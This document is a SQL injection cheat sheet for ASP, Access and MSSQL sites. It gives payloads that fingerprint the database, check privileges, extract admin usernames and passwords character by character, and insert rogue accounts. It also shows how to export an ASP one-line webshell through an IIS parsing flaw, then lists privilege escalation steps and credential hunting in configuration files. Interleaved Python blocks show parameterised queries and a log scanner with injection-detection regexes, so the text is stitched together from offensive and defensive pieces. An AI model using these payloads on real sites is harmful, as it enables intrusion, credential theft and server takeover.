Determine whether there are any vulnerabilities (rough test):

1. Number type:
2. Balanced type:
   - and '1'='1
   - and '1'='2
3. Search type:
   - %' and 1=1 and '%'='%
   - %' and 1=2 and '%'='%
(PS: the third one may not be commonly used. In ASP scripts it is generally written as keyword = request("keyword"), and when that value is spliced into the SQL statement it becomes: select * from table_name where keyword like '%keyword%')
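The search-type case above exists because the request value is pasted straight into the LIKE literal. The following Python/sqlite3 example, added here and not taken from the page or any ASP script it describes, shows that concatenation next to the parameterised form; the table, rows and function names are constructed for the example.

```python
import sqlite3


def make_db():
    """In-memory table with constructed sample rows (not from the page)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("create table articles (id integer primary key, keyword text, title text)")
    conn.executemany(
        "insert into articles (keyword, title) values (?, ?)",
        [
            ("networking", "Segmenting the office LAN"),
            ("backup", "Nightly backup rotation"),
            ("audit", "Reviewing logon events"),
            ("100% done", "Migration status"),
        ],
    )
    return conn


def search_concat(conn, keyword):
    """The pattern the note above describes: the request value is spliced
    straight into the LIKE literal, so a quote in the input closes the
    string and whatever follows is parsed as SQL. Kept only as the
    'before' half of the comparison."""
    sql = "select title from articles where keyword like '%" + keyword + "%'"
    return [row[0] for row in conn.execute(sql)]


def search_param(conn, keyword):
    """Hardened form: the wildcard padding is added in Python and the whole
    value is bound as one parameter, so it can only ever be matched as text.
    '%' and '_' typed by the user are still LIKE wildcards, so they are
    escaped as well and an ESCAPE character is declared."""
    escaped = (
        keyword.replace("\\", "\\\\")
        .replace("%", "\\%")
        .replace("_", "\\_")
    )
    sql = "select title from articles where keyword like ? escape '\\'"
    return [row[0] for row in conn.execute(sql, ("%" + escaped + "%",))]


if __name__ == "__main__":
    db = make_db()
    print("concat  :", search_concat(db, "' or '1'='1"))  # every row comes back
    print("param   :", search_param(db, "' or '1'='1"))   # nothing matches
    print("literal%:", search_param(db, "100%"))          # only the row containing '100%'
```

The escaping of `%` and `_` is the part most hardening guides skip: binding the value as a parameter stops the injection, but without it a user typing `100_` still gets a wildcard match on the first example's `100% done` row.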
Simple judgment of database information:
Statement type (IIS reports no error; distinguish the statements yourself):
- and user>0
- and (select count(*) from msysobjects)>0 ...... (page error: Access database)
- and (select count(*) from sysobjects)>0 ...... (page normal: MSSQL database)
- and db_name()>0 ...... (reveals the database name)
- and version>0 (reveals the SQL Server version and the server operating system type and version)

Rough type: gal' (based on the server error message)

Addition: ; and -- are generally available in MSSQL databases (; separates statements, -- starts a comment); they are not available in Access.
Determine MSSQL permissions:
- and 0<>(select is_srvrolemember('sysadmin'))-- (page normal: SA)
- and 0<>(select is_member('db_owner'))-- (page normal: db_owner)
- and 0<>(select is_member('public'))-- (page normal: public)
PS: The preceding method applies when the parameter is an int. If the parameter is a string type, append ' and the query statement after the parameter, followed by ;--
Start SQL injection:

Guess the table name:
- and 0<>(select count(*) from table_name), or: and exists (select * from table_name)
- and 1<(select count(*) from table_name) (page error indicates that the number of accounts is 1)

Guess the field:
- and exists (select field_name from table_name) (page normal: the field exists; page error: it does not)

Length of the username and password:
- and (select top 1 len(column_name) from table_name)>N (top 1 extracts the first record; N is the length being tested; a page error at N indicates the column length is N)
  For example: and 1=(select count(*) from user where len(name)>6) gives an error, and 1=(select count(*) from user where len(name)>5) is correct, so the length is 6.

Guess the username and password:
- and (select top 1 asc(mid(column_name,1,1)) from table_name)>0
  For example: and (select top 1 asc(mid(user,1,1)) from name)>96 page normal; and (select top 1 asc(mid(user,1,1)) from name)>97 page error; so the ASCII code is 97.
PS: Because MD5 ciphertext is only 16, 18, 32 or 40 characters long, when guessing the password length you only need to try 15, 16, 17, 18, 31, 32, 39, 40 and so on.

Start SQL injection (MSSQL):

Table name and field:
- having 1=1--
- group by users.id having 1=1--
- group by users.id, users.username, users.password, users.privs having 1=1--

Insert a new record:
- ; insert into users values (666, 'attacker', 'foobar', 0xffff)--

Guess the table name:
- and (select top 1 name from sysobjects where xtype='U')>0 (obtain the first table name)
- and (select top 1 name from sysobjects where xtype='U' and name not in ('user'))>0 (obtain the second table name)
- ..................

Guess the column name:
- and (select top 1 col_name(object_id('table_name'),1) from sysobjects)>0 (obtain the first column name of the table)

Guess the content of the field:
- and (select top 1 column_name from [table_name])>0
  For example: and (select top 1 username from [admin])>0 (obtain the user name); and (select top 1 password from [admin])>0 (obtain the password)
Export webshell:

1. Use the SQL command execution function to export a webshell:
   - select '<% execute request("A") %>' into [vote] in 'd:\WEB\x.asp;.xls' 'excel 8.0;' from vote
   PS: You must have the SQL execution function and know the absolute path (vote is a known table).
2. Create a one-sentence Trojan: create a table whose field a is 50 characters long, insert the one-sentence shell with password 90sec into field a, and export the contents of the table as an Excel file under the physical path. Once exported as an Excel file, the IIS parsing vulnerability lets it run as a small shell ("pony"). Statements:
   - create table cmd (a varchar(50))
   - insert into cmd (a) values ('<% execute request("90sec") %>')
   - select * into [a] in 'f:\host\qhdyxt\WEB\a.asp;.xls' 'excel 4.0;' from cmd
   - drop table cmd
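Every request in the sections above leaves a trace in the web server's access log: the and 1=1 / and 1=2 pairs, sysobjects and msysobjects probes, asc(mid(...)) and len(...) character guessing, and the stacked ; select ... into ... in '...' export. The following Python script is an added defensive example (not part of the original cheat sheet) that URL-decodes each query parameter of combined-format log lines and flags those patterns; the log lines, signature names and IP addresses are constructed for the example.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access-log lines (combined log format, not taken from
# the page). The query strings carry the kinds of probes the cheat sheet
# lists, URL-encoded the way a browser or tool would send them.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /show.asp?id=12 HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /show.asp?id=12' HTTP/1.1" 500 311
10.0.0.5 - - [01/Jan/2024:10:00:03 +0000] "GET /show.asp?id=12%20and%201=1 HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2024:10:00:04 +0000] "GET /show.asp?id=12%20and%201=2 HTTP/1.1" 200 498
10.0.0.5 - - [01/Jan/2024:10:00:05 +0000] "GET /show.asp?id=12%20and%20(select%20count(*)%20from%20sysobjects)%3E0 HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2024:10:00:06 +0000] "GET /show.asp?id=12%20and%20(select%20top%201%20asc(mid(user,1,1))%20from%20name)%3E96 HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2024:10:00:07 +0000] "GET /show.asp?id=12;select%20'x'%20into%20[vote]%20in%20'd:\\web\\x.asp;.xls'%20'excel%208.0;'%20from%20vote-- HTTP/1.1" 500 311
10.0.0.9 - - [01/Jan/2024:10:00:08 +0000] "GET /search.asp?keyword=red%20and%20blue HTTP/1.1" 200 2048
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+|-)$'
)

# Each signature is (label, regex). The regex runs against one URL-decoded,
# lower-cased, whitespace-collapsed parameter value, so encoding and case
# tricks do not hide the probe. Labels are our own naming.
SIGNATURES = [
    ("boolean-probe", re.compile(r"\b(?:and|or)\s+'?\d+'?\s*=\s*'?\d+'?")),
    ("trailing-quote", re.compile(r"'$")),
    ("schema-enumeration", re.compile(
        r"\b(?:sysobjects|msysobjects|syscolumns)\b|\b(?:col_name|object_id)\s*\(")),
    ("blind-char-probe", re.compile(r"\b(?:asc|ascii|mid|substring|len)\s*\(")),
    ("privilege-probe", re.compile(r"\b(?:is_srvrolemember|is_member|db_name)\s*\(")),
    ("stacked-query", re.compile(r";\s*(?:select|insert|update|delete|drop|exec)\b")),
    ("file-export", re.compile(r"\binto\s+\[?\w+\]?\s+in\s+'[^']*\.(?:asp|aspx|php|xls)")),
]


def decode_params(query):
    """Split a raw query string on '&' and URL-decode each name/value pair.
    Done by hand rather than with parse_qsl so a ';' inside a value (the
    stacked-query separator) stays part of that value."""
    params = []
    for pair in query.split("&"):
        if not pair:
            continue
        name, _, value = pair.partition("=")
        params.append((unquote_plus(name), unquote_plus(value)))
    return params


def normalize(value):
    """Lower-case and collapse whitespace so the signatures stay simple."""
    return re.sub(r"\s+", " ", value.lower()).strip()


def scan_line(line):
    """Return a list of (ip, path, param, label) findings for one log line;
    an empty list means the line is clean or not in the expected format."""
    m = LOG_RE.match(line)
    if not m:
        return []
    path, _, query = m.group("target").partition("?")
    findings = []
    for name, value in decode_params(query):
        norm = normalize(value)
        for label, rx in SIGNATURES:
            if rx.search(norm):
                findings.append((m.group("ip"), path, name, label))
    return findings


def scan_log(text):
    """Scan every line of a log file body; findings are kept in file order."""
    out = []
    for line in text.splitlines():
        out.extend(scan_line(line))
    return out


def summarize(findings):
    """Distinct signature labels per client IP. One trailing-quote hit can be
    a typo; a client that trips several different signatures is enumerating."""
    by_ip = {}
    for ip, _path, _param, label in findings:
        by_ip.setdefault(ip, set()).add(label)
    return {ip: sorted(labels) for ip, labels in by_ip.items()}


if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        print(finding)
    print(summarize(scan_log(SAMPLE_LOG)))
```

The per-client summary is the useful output: the `red and blue` search on the last line trips nothing, while the client that sent the whole sequence from the quote test through the file export is reported with six distinct signatures. Pairing this with the response-size difference between the `and 1=1` and `and 1=2` requests (512 versus 498 bytes in the sample) is how the boolean probe is confirmed from the log alone.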
Elevation of Privilege:
1. Add an account directly under system permissions (if possible): run the CMD command to add the account.
2. Use the privilege escalation functions provided by the shell: serv_u, pcAnywhere and Radmin password reading. Try all of them.
3. Exploit system vulnerabilities to escalate permissions: use "Brazilian barbecue" and, on the CMD command line, enter C:\recycler\1.exe followed by a space and the command, where 1.exe is the Brazilian barbecue.
4. Privilege escalation using software vulnerabilities (this opportunity is relatively slim, and I have never succeeded).
5. Search for the SA password in conn.asp or web.config, or the root password in files such as inc.php (you can use CMD to find the configuration file, for example DIR /s d:\conn.asp or DIR /s d:\*inc*.php).